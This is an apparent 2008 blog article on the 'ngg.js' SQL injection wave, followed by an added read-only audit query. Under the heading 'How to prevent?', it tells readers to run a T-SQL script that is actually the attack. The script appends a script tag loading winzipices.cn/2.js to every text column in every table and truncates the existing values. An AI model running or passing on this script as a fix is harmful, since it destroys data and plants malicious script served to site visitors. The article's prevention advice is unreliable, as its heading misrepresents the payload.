ngg.js

Article by Hariadi
22 Jul 2008

What is */ngg.js?

There seems to be a new wave of SQL injections ending with ngg.js. It is the familiar iframe attack from before, but this time it selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India.

How to prevent?

Open your SQL Tool Analyzer and type this:


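/* What this script does: for every user table and every text-type column,
   it rewrites each row's value to end with the <script> tag in the EXEC line.
   CONVERT(VARCHAR, ...) with no length keeps only the first 30 characters
   of the existing value. */
DECLARE @T VARCHAR(255)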
DECLARE @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT [A].[Name], [B].[Name]
FROM sysobjects AS [A], syscolumns AS [B]
WHERE [A].[ID] = [B].[ID] AND
[A].[XType] = 'U' /* Table (User-Defined) */ AND
([B].[XType] = 99 /* NTEXT */ OR
[B].[XType] = 35 /* TEXT */ OR
[B].[XType] = 231 /* SYSNAME */ OR
[B].[XType] = 167 /* VARCHAR */)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C

WHILE (@@FETCH_STATUS = 0)
BEGIN
EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''<script src="http://winzipices.cn/2.js"></script>''')
FETCH NEXT FROM Table_Cursor INTO @T, @C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor 
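
The script above writes to every text-type column it finds. As an added example (not from the original article), the following read-only T-SQL walks the same kinds of columns and counts rows that already contain an appended script tag. The `#Hits` table, the cursor name and the `'%<script src=%'` pattern are assumptions made for illustration, and legitimate content that contains a script tag will also match.

```sql
-- Added example: read-only audit. It only SELECTs from your tables;
-- results go into a temporary table that is dropped at the end.
SET NOCOUNT ON;

DECLARE @Schema SYSNAME, @T SYSNAME, @C SYSNAME;
DECLARE @Sql NVARCHAR(4000), @Marker NVARCHAR(100);

-- Assumption: the appended tag starts with '<script src=' as in the script above.
SET @Marker = N'%<script src=%';

CREATE TABLE #Hits (
    SchemaName  NVARCHAR(128),
    TableName   NVARCHAR(128),
    ColumnName  NVARCHAR(128),
    MatchedRows INT
);

DECLARE Audit_Cursor CURSOR LOCAL FAST_FORWARD FOR
SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
FROM INFORMATION_SCHEMA.COLUMNS AS c
JOIN INFORMATION_SCHEMA.TABLES AS t
  ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
WHERE t.TABLE_TYPE = 'BASE TABLE'
  AND c.DATA_TYPE IN ('ntext', 'text', 'nvarchar', 'varchar');

OPEN Audit_Cursor;
FETCH NEXT FROM Audit_Cursor INTO @Schema, @T, @C;

WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- QUOTENAME keeps unusual table/column names from breaking the dynamic SQL;
    -- the search pattern is passed as a parameter, not concatenated.
    SET @Sql = N'INSERT INTO #Hits SELECT @ps, @pt, @pc, COUNT(*) FROM '
             + QUOTENAME(@Schema) + N'.' + QUOTENAME(@T)
             + N' WHERE ' + QUOTENAME(@C) + N' LIKE @pm HAVING COUNT(*) > 0';
    EXEC sp_executesql @Sql,
         N'@ps SYSNAME, @pt SYSNAME, @pc SYSNAME, @pm NVARCHAR(100)',
         @ps = @Schema, @pt = @T, @pc = @C, @pm = @Marker;
    FETCH NEXT FROM Audit_Cursor INTO @Schema, @T, @C;
END

CLOSE Audit_Cursor;
DEALLOCATE Audit_Cursor;

-- One row per column that contains at least one match.
SELECT SchemaName, TableName, ColumnName, MatchedRows
FROM #Hits
ORDER BY MatchedRows DESC;

DROP TABLE #Hits;
```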

Check your code?

Download Scrawlr to find vulnerabilities in your code.

Related

ASCII Encoded/Binary String Automated SQL Injection Attack
Preventing SQL Injections

Category: How-To, Security